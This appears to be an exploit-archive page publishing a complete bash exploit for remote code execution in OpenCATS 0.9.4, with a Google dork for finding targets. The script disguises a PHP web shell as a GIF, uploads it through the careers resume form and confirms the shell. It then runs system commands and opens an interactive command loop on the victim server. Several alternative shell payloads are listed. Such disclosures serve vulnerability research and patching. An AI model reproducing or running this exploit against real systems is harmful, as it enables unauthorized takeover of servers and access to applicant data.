OpenCATS 0.9.4 Remote Code Execution

2021.12.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE) # Google Dork: intext:"Current Available Openings, Recently Posted Jobs" # Date: 21/09/2021 # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar # Vendor Homepage: https://www.opencats.org/ # Software Link: https://github.com/opencats/OpenCATS # Version: <=0.9.4 Countach # Tested on: Debian, CentOS, Windows Server #!/bin/bash if [ $# -eq 0 ] then echo "Usage: $0 <target URL>" exit fi # if a payload doesn't work, try another payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>' #payload='GIF87a<?php echo `$_REQUEST[0]`; ?>' #payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>' target=$1 green="\033[0;32m" red="\033[0;31m" reset="\033[0m" #====================== Functions rev() { while true do echo -n -e "\n$ " read cmd curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d" done } upload() { curl -skL $1/$2 \ -H "Connection: close" \ -F resumeFile=@"$3;type=application/x-php" \ -F ID="$firstJb" \ -F candidateID="-1" \ -F applyToJobSubAction="resumeLoad" \ --compressed \ --insecure } getVersion() { ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}" return 0 fi fi echo -e "${green}[*] Version detected: $ver${reset}" } writePayload(){ tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php" file=`basename $tmpfile` echo "$1" > $tmpfile } banner(){ echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d echo -e "\n" } #====================== banner echo "[*] Attacking target $target" echo "[*] Checking CATS version..." getVersion $target #exit echo "[*] Creating temp file with payload..." writePayload "$payload" #exit echo "[*] Checking active jobs..." jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'` firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] No active jobs found.${reset}" echo "[*] Trying another path..." jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] Couldn't find any active job.${reset}" exit fi fi firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}" echo "[*] Sending payload..." req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}" echo "[*] Checking by another method..." sed -i "s/GIF87a//" $tmpfile req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't upload payload...${reset}" exit fi fi echo -e "${green}[+] Payload $file uploaded!" echo "[*] Deleting created temp file..." rm $tmpfile echo "[*] Checking shell..." check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file") if `echo $check | grep -q "0x7359"` then echo -e "${green}[+] Got shell! :D${reset}" curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d" rev $target/upload/careerportaladd/$file else echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}" fi


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top